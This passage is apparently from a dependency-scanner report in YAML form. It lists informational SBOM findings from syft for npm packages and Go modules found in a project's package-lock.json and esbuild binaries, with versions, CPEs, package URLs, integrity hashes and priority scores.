/node_modules/@esbuild/darwin-arm64/bin/esbuild annotations: evidence: primary licenses: [] language: go cpes: - cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:* source: syft-generated purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2 metadataType: go-module-buildinfo-entry metadata: goBuildSettings: - key: -buildmode value: exe - key: -compiler value: gc - key: -trimpath value: 'true' - key: CGO_ENABLED value: '0' - key: GOARCH value: arm64 - key: GOOS value: darwin - key: vcs value: git - key: vcs.revision value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e - key: vcs.time value: '2024-06-09T21:16:31Z' - key: vcs.modified value: 'false' goCompiledVersion: go1.20.12 architecture: arm64 mainModule: github.com/evanw/esbuild goCryptoSettings: - standard-crypto compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 701c2b7f153ed08a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/esbuild/bin/esbuild startLine: 0 message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2 description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0dc26b5347e8f4df name: github.com/evanw/esbuild version: v0.0.0-20240609211631-fc37c2fa9de2 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/esbuild/bin/esbuild accessPath: /node_modules/esbuild/bin/esbuild annotations: evidence: primary licenses: [] language: go cpes: - cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:* source: syft-generated purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2 metadataType: go-module-buildinfo-entry metadata: goBuildSettings: - key: -buildmode value: exe - key: -compiler value: gc - key: -trimpath value: 'true' - key: CGO_ENABLED value: '0' - key: GOARCH value: arm64 - key: GOOS value: darwin - key: vcs value: git - key: vcs.revision value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e - key: vcs.time value: '2024-06-09T21:16:31Z' - key: vcs.modified value: 'false' goCompiledVersion: go1.20.12 architecture: arm64 mainModule: github.com/evanw/esbuild goCryptoSettings: - standard-crypto compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0bd7d35ef088b0fd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: glob 10.5.0' title: glob 10.5.0 description: 'Package discovered: glob 10.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8da722cb9983d6b3 name: glob version: 10.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/glob@10.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/glob/-/glob-10.5.0.tgz integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg== dependencies: foreground-child: ^3.1.0 jackspeak: ^3.1.2 minimatch: ^9.0.4 minipass: ^7.1.2 package-json-from-dist: ^1.0.0 path-scurry: ^1.11.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 282a3bcad6a151e3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: glob-parent 5.1.2' title: glob-parent 5.1.2 description: 'Package discovered: glob-parent 5.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e9e84f484cfaf367 name: glob-parent version: 5.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/glob-parent@5.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow== dependencies: is-glob: ^4.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4709c0ff6455a8d2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: glob-parent 6.0.2' title: glob-parent 6.0.2 description: 'Package discovered: glob-parent 6.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1644b4942c7696f6 name: glob-parent version: 6.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/glob-parent@6.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz integrity: sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A== dependencies: is-glob: ^4.0.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0dbbd23e15d1e62b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@esbuild/darwin-arm64/bin/esbuild startLine: 0 message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8 description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7890a665ce9e5849 name: golang.org/x/sys version: v0.0.0-20220715151400-c0bba94af5f8 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild annotations: evidence: primary licenses: [] language: go cpes: - cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:* source: syft-generated purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8 metadataType: go-module-buildinfo-entry metadata: goCompiledVersion: go1.20.12 architecture: arm64 h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ= mainModule: github.com/evanw/esbuild goCryptoSettings: - standard-crypto compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5c6e328f37ad400d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/esbuild/bin/esbuild startLine: 0 message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8 description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 839067488ff020a0 name: golang.org/x/sys version: v0.0.0-20220715151400-c0bba94af5f8 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/esbuild/bin/esbuild accessPath: /node_modules/esbuild/bin/esbuild annotations: evidence: primary licenses: [] language: go cpes: - cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:* source: syft-generated purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8 metadataType: go-module-buildinfo-entry metadata: goCompiledVersion: go1.20.12 architecture: arm64 h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ= mainModule: github.com/evanw/esbuild goCryptoSettings: - standard-crypto compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 59d2bd18fdd1d561 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: google-auth-library 9.15.1' title: google-auth-library 9.15.1 description: 'Package discovered: google-auth-library 9.15.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4fb04863a4dacd73 name: google-auth-library version: 9.15.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/google-auth-library@9.15.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz integrity: sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng== dependencies: base64-js: ^1.3.0 ecdsa-sig-formatter: ^1.0.11 gaxios: ^6.1.1 gcp-metadata: ^6.1.0 gtoken: ^7.0.0 jws: ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f744ca691ff58390 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: google-gax 4.6.1' title: google-gax 4.6.1 description: 'Package discovered: google-gax 4.6.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3344aade71052029 name: google-gax version: 4.6.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/google-gax@4.6.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz integrity: sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ== dependencies: '@grpc/grpc-js': ^1.10.9 '@grpc/proto-loader': ^0.7.13 '@types/long': ^4.0.0 abort-controller: ^3.0.0 duplexify: ^4.0.0 google-auth-library: ^9.3.0 node-fetch: ^2.7.0 object-hash: ^3.0.0 proto3-json-serializer: ^2.0.2 protobufjs: ^7.3.2 retry-request: ^7.0.0 uuid: ^9.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 38ca80e4adb1c1ba ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: google-logging-utils 0.0.2' title: google-logging-utils 0.0.2 description: 'Package discovered: google-logging-utils 0.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c45a9f7f7c5a1d26 name: google-logging-utils version: 0.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/google-logging-utils@0.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz integrity: sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bb6c934fdca5487f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: gopd 1.2.0' title: gopd 1.2.0 description: 'Package discovered: gopd 1.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2f2433574e565258 name: gopd version: 1.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/gopd@1.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 30861bd8904bacc9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: graceful-fs 4.2.11' title: graceful-fs 4.2.11 description: 'Package discovered: graceful-fs 4.2.11' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 45319b4c36cfb339 name: graceful-fs version: 4.2.11 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/graceful-fs@4.2.11 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a916a255ccf430d7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: gtoken 7.1.0' title: gtoken 7.1.0 description: 'Package discovered: gtoken 7.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fe4d11ddc8ba95f7 name: gtoken version: 7.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/gtoken@7.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz integrity: sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw== dependencies: gaxios: ^6.0.0 jws: ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d28454794acf7740 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: has-symbols 1.1.0' title: has-symbols 1.1.0 description: 'Package discovered: has-symbols 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fcd80b2c54be3c8f name: has-symbols version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/has-symbols@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f33597863ab8f3be ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: has-tostringtag 1.0.2' title: has-tostringtag 1.0.2 description: 'Package discovered: has-tostringtag 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7749e9981a33e1c1 name: has-tostringtag version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/has-tostringtag@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz integrity: sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw== dependencies: has-symbols: ^1.0.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 96e286f1b1295263 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: hasown 2.0.3' title: hasown 2.0.3 description: 'Package discovered: hasown 2.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6f96b80a7d603954 name: hasown version: 2.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/hasown@2.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg== dependencies: function-bind: ^1.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e883502c6fb5e040 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: helmet 7.2.0' title: helmet 7.2.0 description: 'Package discovered: helmet 7.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ad14b3d3d950e009 name: helmet version: 7.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/helmet@7.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz integrity: sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5ce7a5c301b19471 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: 